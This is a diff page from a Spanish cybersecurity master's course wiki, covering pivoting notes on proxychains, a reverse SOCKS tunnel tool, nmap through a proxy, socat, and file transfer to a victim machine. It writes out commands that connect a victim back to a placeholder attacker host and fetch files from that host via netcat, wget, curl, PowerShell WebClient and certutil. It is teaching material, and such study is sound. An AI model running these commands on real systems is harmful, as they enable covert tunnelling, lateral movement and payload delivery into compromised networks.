Knoppia

Wiki de Informática y otras historias

Herramientas de usuario

Herramientas del sitio

Estás aquí: Knoppia Wiki » Apuntes Master en CiberSeguridad (MUNICS) Inter-Universitario UDC y UVIGO » Hacking Ético e Intrusión » Pivoting
master_cs:int:tm7v2

Diferencias

Muestra las diferencias entre dos versiones de la página.

Enlace a la vista de comparación

Próxima revisión		Revisión previa
master_cs:int:tm7v2 [2026/05/18 21:50] – creado thejuanvisumaster_cs:int:tm7v2 [2026/05/19 12:59] (actual) thejuanvisu
Línea 19: Línea 19:
   * STRICT_CHAIN: Seguirá la lista de proxies de forma ordenada. En caso de que alguno de los proxy de la lsita fallen, no se establecerá la conexión. Esta opción se utiliza para comprobar la funcionalidad del total de proxies en la lsita.   * STRICT_CHAIN: Seguirá la lista de proxies de forma ordenada. En caso de que alguno de los proxy de la lsita fallen, no se establecerá la conexión. Esta opción se utiliza para comprobar la funcionalidad del total de proxies en la lsita.
   * DYNAMIC_CHAIN: El encadenamiento dinámico permite ejecutar el tráfico a través de todos los proxies de la lsita, si uno está caido, se salta automáticamente al siguiente sin errores.   * DYNAMIC_CHAIN: El encadenamiento dinámico permite ejecutar el tráfico a través de todos los proxies de la lsita, si uno está caido, se salta automáticamente al siguiente sin errores.
-  * RANDOM_CHAIN: +  * RANDOM_CHAIN: Permitirá a los proxychains elegir aleatoriamente direcciones IP de la lista, cada vez que se use proxychains, la cadena del proxy tendrá un aspecto diferente al del objetivo. 
 + 
 +===== Chinsel ===== 
 +Es un túnel TCP/UDP sobre HTTP securizado via SSH. Funciona como un único ejecutble multiplataforma tanto en modo cliente como modo servidor. 
 +<code c> 
 +#A ejecutar en el atacante 
 +./chinsel server -reverse -p <Puerto_atacante> 
 + 
 +#A ejecutar en la víctima 
 +./chinsel client <ip_atacate>:<Puerto_atacante> R:socks 
 +</code> 
 + 
 +Por defecto, chinsel se configura en el puerto 1080 asociado al proxychains, por lo que se debe añadir al fichero proxychains.conf. 
 + 
 +<code ini> 
 +socks5 127.0.0.1 1080 
 +</code> 
 + 
 +Una vez se tiene conectividad a través de la máquina víctima, se puede acceder a otras máquinas desconocidas, para ello se puede realizar un descubrimiento de la red con el siguiente comando: 
 + 
 +<code> 
 +proxychains nmap -A -Pn -n -p-o -v <IP_objetivo> 
 +</code> 
 + 
 + 
 +===== FoxyProxy ===== 
 + 
 +Si se quiere usar el navegador sobre el proxy, se debe configurar la extensión FoxyProxy sobre el navegador para que utilice el proxychains configurado. 
 + 
 +===== Socat ===== 
 + 
 +Establece 2 flujos de bytes bidireccionales y transfiere datos entre ellos. Los canales de datos pueden ser archivos, tuberías, dispositivos o sockets. Proporciona bifurcación, registro y rastreo, distintos modos de comunicación entre procesos y muchas más opciones. 
 + 
 +====== Trasferencia de archivos ====== 
 +===== Netcat ===== 
 + 
 +<code c> 
 +#Desde el atacante 
 +nc -lvp <puerto_atacante> < <archivo> 
 + 
 +#Desde la víctima 
 +nc <IP_atacante> <Puerto_atacante> > <archivo> 
 +</code> 
 + 
 +===== Python ===== 
 +<code powershell> 
 +#Se crea un pequeño servidor web en el atacante con python 
 +Python -m SimpleHTTPServer <PUERTO_ATACANTE> 
 + 
 +#[LINUX] Se usa WGET o CURL desde la máquina objetivo para descargar el archivo  
 +wget http://<IP_ATACANTE>:<PUERTO_atacante>/<archivo> 
 +curl -O http://<IP_ATACANTE>:<PUERTO_atacante>/<archivo> 
 + 
 +#[WINDOWS] Se usa Windows File Transfer 
 +powershell -c "(new-object 
 +System.Net.WebClient).DownloadFile('http://<IP_ATACANTE>:<PUERTO_ATACANTE>/<archivo>',' 
 +C:\Users\user\Desktop\<archivo>')“ 
 + 
 +certutil -urlcache -f http://<IP_ATACANTE>:<PUERTO_ATACANTE>/<archivo> <archivo> 
 +</code>
master_cs/int/tm7v2.1779141053.txt.gz · Última modificación: 2026/05/18 21:50 por thejuanvisu

Herramientas de la página

Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki